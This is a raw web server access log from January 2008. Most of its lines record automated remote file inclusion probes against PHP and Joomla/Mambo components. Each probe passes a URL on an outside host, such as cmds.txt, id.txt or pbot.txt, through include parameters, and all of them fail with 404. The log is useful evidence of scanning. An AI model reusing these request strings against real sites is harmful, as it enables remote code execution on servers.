69.10.155.237 - - [10/Jan/2008:13:25:28 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.slmsistemas.net/components/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.29.19 - - [10/Jan/2008:13:26:03 -0800] "GET /tmp/ HTTP/1.0" 200 1657 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.10.155.237 - - [10/Jan/2008:13:26:33 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.slmsistemas.net/components/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.155.237 - - [10/Jan/2008:13:26:33 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.slmsistemas.net/components/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.155.237 - - [10/Jan/2008:13:26:33 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.slmsistemas.net/components/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.50.14.189 - - [10/Jan/2008:13:26:51 -0800] "GET /logs/access_071229.log//index.php?seite=http://www.urworte.de/wp-content/plugins/mygallery/myfunctions/ALB.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.50.14.189 - - [10/Jan/2008:13:26:52 -0800] "GET //index.php?seite=http://www.urworte.de/wp-content/plugins/mygallery/myfunctions/ALB.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.50.14.189 - - [10/Jan/2008:13:26:52 -0800] "GET /logs//index.php?seite=http://www.urworte.de/wp-content/plugins/mygallery/myfunctions/ALB.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.120.136.110 - - [10/Jan/2008:13:27:53 -0800] "GET /minamijewelry/html HTTP/1.0" 301 87 "16" "MSIE5.5" "www.dmulk.com"
66.120.136.110 - - [10/Jan/2008:13:27:54 -0800] "GET /minamijewelry/html/ HTTP/1.0" 200 13288 "-" "MSIE5.5" "www.dmulk.com"
64.15.147.104 - - [10/Jan/2008:13:28:32 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.61.34 - - [10/Jan/2008:13:28:36 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.61.34 - - [10/Jan/2008:13:28:36 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.61.34 - - [10/Jan/2008:13:28:41 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.61.34 - - [10/Jan/2008:13:28:41 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.166.231 - - [10/Jan/2008:13:28:44 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.166.231 - - [10/Jan/2008:13:28:44 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.166.231 - - [10/Jan/2008:13:28:45 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.166.231 - - [10/Jan/2008:13:28:45 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.166.231 - - [10/Jan/2008:13:28:52 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.166.231 - - [10/Jan/2008:13:28:52 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.166.231 - - [10/Jan/2008:13:29:06 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.166.231 - - [10/Jan/2008:13:29:06 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
151.1.141.17 - - [10/Jan/2008:13:29:13 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [10/Jan/2008:13:29:15 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [10/Jan/2008:13:29:16 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [10/Jan/2008:13:29:19 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.9.218 - - [10/Jan/2008:13:30:20 -0800] "GET /logs//index.php?seite=http://www.gatecrashing.net/template/1?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [10/Jan/2008:13:30:20 -0800] "GET //index.php?seite=http://www.gatecrashing.net/template/1?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.57.81.49 - - [10/Jan/2008:13:31:20 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.9.218 - - [10/Jan/2008:13:32:53 -0800] "GET /logs//index.php?seite=http://www.gatecrashing.net/template/1?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [10/Jan/2008:13:32:54 -0800] "GET //index.php?seite=http://www.gatecrashing.net/template/1?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.131.209.130 - - [10/Jan/2008:13:32:55 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.131.209.130 - - [10/Jan/2008:13:32:55 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
60.80.40.5 - - [10/Jan/2008:13:33:55 -0800] "GET /logs/access_071219.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.9.218 - - [10/Jan/2008:13:34:47 -0800] "GET /logs//index.php?seite=http://www.gatecrashing.net/template/1?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [10/Jan/2008:13:34:47 -0800] "GET //index.php?seite=http://www.gatecrashing.net/template/1?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [10/Jan/2008:13:35:09 -0800] "GET /logs//index.php?seite=http://www.gatecrashing.net/template/1?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [10/Jan/2008:13:35:09 -0800] "GET //index.php?seite=http://www.gatecrashing.net/template/1?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.108.67.176 - - [10/Jan/2008:13:36:16 -0800] "GET /logs/access_071225.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [10/Jan/2008:13:36:16 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [10/Jan/2008:13:36:17 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.157.182.9 - - [10/Jan/2008:13:36:35 -0800] "GET /logs/access_071205.log//?mosConfig_absolute_path=http://www.kedaikopionline.com/chat/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.153.16.5 - - [10/Jan/2008:13:37:40 -0800] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.10.155.237 - - [10/Jan/2008:13:40:50 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.slmsistemas.net/components/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.67.103 - - [10/Jan/2008:13:40:53 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://seucu.us/pbot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.157.101.161 - - [10/Jan/2008:13:41:30 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.stoned.helloweb.eu/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
85.157.101.161 - - [10/Jan/2008:13:41:30 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.stoned.helloweb.eu/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
213.195.65.245 - - [10/Jan/2008:13:41:54 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://seucu.us/pbot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.23.227 - - [10/Jan/2008:13:42:19 -0800] "GET /tmp/?S=A HTTP/1.0" 200 1657 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.146.84.252 - - [10/Jan/2008:13:42:45 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.146.84.252 - - [10/Jan/2008:13:42:45 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.193.225.104 - - [10/Jan/2008:13:43:51 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://anto.fr/skin/mambots/system/.errors.php/.../cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.227.219.70 - - [10/Jan/2008:13:47:30 -0800] "GET /logs/access_071224.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.219.70 - - [10/Jan/2008:13:47:30 -0800] "GET //MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.219.70 - - [10/Jan/2008:13:47:31 -0800] "GET /logs//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.174.211 - - [10/Jan/2008:13:49:39 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.41.174.211 - - [10/Jan/2008:13:49:39 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.41.174.211 - - [10/Jan/2008:13:49:39 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.59.71.243 - - [10/Jan/2008:13:49:51 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.243 - - [10/Jan/2008:13:49:52 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.243 - - [10/Jan/2008:13:49:52 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.227.219.70 - - [10/Jan/2008:13:50:16 -0800] "GET /logs/access_071214.log//inc/cmses/aedating4CMS.php?dir[inc]=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.219.70 - - [10/Jan/2008:13:50:16 -0800] "GET //inc/cmses/aedating4CMS.php?dir[inc]=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.219.70 - - [10/Jan/2008:13:50:16 -0800] "GET /logs//inc/cmses/aedating4CMS.php?dir[inc]=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.219.70 - - [10/Jan/2008:13:50:43 -0800] "GET /logs/access_071129.log//inc/cmses/aedating4CMS.php?dir[inc]=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.59.71.243 - - [10/Jan/2008:13:51:35 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.227.219.70 - - [10/Jan/2008:13:51:48 -0800] "GET /logs/access_071222.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.174.211 - - [10/Jan/2008:13:52:31 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.57.81.49 - - [10/Jan/2008:13:53:02 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.134.164 - - [10/Jan/2008:13:54:55 -0800] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.134.164 - - [10/Jan/2008:13:54:55 -0800] "GET /skin/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.134.164 - - [10/Jan/2008:13:54:56 -0800] "GET /logs/skin/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.67.103 - - [10/Jan/2008:13:54:58 -0800] "GET /logs/access_071219.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://seucu.us/pbot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.103 - - [10/Jan/2008:13:54:58 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://seucu.us/pbot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.182.225 - - [10/Jan/2008:13:54:59 -0800] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.182.225 - - [10/Jan/2008:13:54:59 -0800] "GET /skin/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.182.225 - - [10/Jan/2008:13:54:59 -0800] "GET /logs/skin/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.2.252.37 - - [10/Jan/2008:13:55:20 -0800] "GET /cyberfolio/portfolio/msg/view.php?av=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.2.252.37 - - [10/Jan/2008:13:55:21 -0800] "GET /cyberfolio/portfolio/msg/view.php?av=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.67.103 - - [10/Jan/2008:13:56:41 -0800] "GET /logs/access_071212.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://seucu.us/pbot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.225.104 - - [10/Jan/2008:13:57:06 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://anto.fr/skin/mambots/system/.errors.php/.../cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.225.104 - - [10/Jan/2008:13:57:06 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://anto.fr/skin/mambots/system/.errors.php/.../cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.225.104 - - [10/Jan/2008:13:57:07 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://anto.fr/skin/mambots/system/.errors.php/.../cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
122.153.194.3 - - [10/Jan/2008:13:59:02 -0800] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.153.194.3 - - [10/Jan/2008:13:59:03 -0800] "GET /skin/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.153.194.3 - - [10/Jan/2008:13:59:04 -0800] "GET /logs/skin/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.24.70 - - [10/Jan/2008:14:01:33 -0800] "GET /logs/access_071128.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.195.65.245 - - [10/Jan/2008:14:01:54 -0800] "GET /logs/access_071219.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://seucu.us/pbot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.195.65.245 - - [10/Jan/2008:14:01:54 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://seucu.us/pbot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.195.65.245 - - [10/Jan/2008:14:03:32 -0800] "GET /logs/access_071220.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://seucu.us/pbot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.229.26.205 - - [10/Jan/2008:14:03:38 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
87.229.26.205 - - [10/Jan/2008:14:03:38 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
81.2.252.37 - - [10/Jan/2008:14:03:41 -0800] "GET /logs/access_071229.log/cyberfolio/portfolio/msg/view.php?av=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.2.252.37 - - [10/Jan/2008:14:03:41 -0800] "GET /logs/access_071229.log/cyberfolio/portfolio/msg/view.php?av=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.2.252.37 - - [10/Jan/2008:14:03:42 -0800] "GET /logs/cyberfolio/portfolio/msg/view.php?av=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.2.252.37 - - [10/Jan/2008:14:03:42 -0800] "GET /logs/cyberfolio/portfolio/msg/view.php?av=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.98.246.23 - - [10/Jan/2008:14:03:52 -0800] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.246.23 - - [10/Jan/2008:14:03:52 -0800] "GET /skin/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.246.23 - - [10/Jan/2008:14:03:52 -0800] "GET /logs/skin/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.55.148.27 - - [10/Jan/2008:14:04:29 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.asolutionsts.com/sugarcrm/id4.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
72.55.148.27 - - [10/Jan/2008:14:04:29 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.asolutionsts.com/sugarcrm/id4.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
60.80.40.5 - - [10/Jan/2008:14:06:54 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.80.40.5 - - [10/Jan/2008:14:06:54 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.80.40.5 - - [10/Jan/2008:14:08:29 -0800] "GET /logs/access_071225.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.171.242 - - [10/Jan/2008:14:11:30 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.arrlri.org/res? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
69.93.171.242 - - [10/Jan/2008:14:11:30 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.arrlri.org/res? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
80.57.81.49 - - [10/Jan/2008:14:13:06 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.8.71 - - [10/Jan/2008:14:20:23 -0800] "GET /mobileoffice/?S=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.57.81.49 - - [10/Jan/2008:14:21:13 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.57.81.49 - - [10/Jan/2008:14:21:14 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.57.81.49 - - [10/Jan/2008:14:22:44 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.190.144.116 - - [10/Jan/2008:14:26:24 -0800] "GET //components/com_akocomment/akocomments.php?mosConfig_absolute_path=http://pattaya-revealed.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
80.190.144.116 - - [10/Jan/2008:14:26:24 -0800] "GET /logs//components/com_akocomment/akocomments.php?mosConfig_absolute_path=http://pattaya-revealed.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
74.6.23.232 - - [10/Jan/2008:14:27:29 -0800] "GET /minamijewelry/dream.psd HTTP/1.0" 200 109304 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
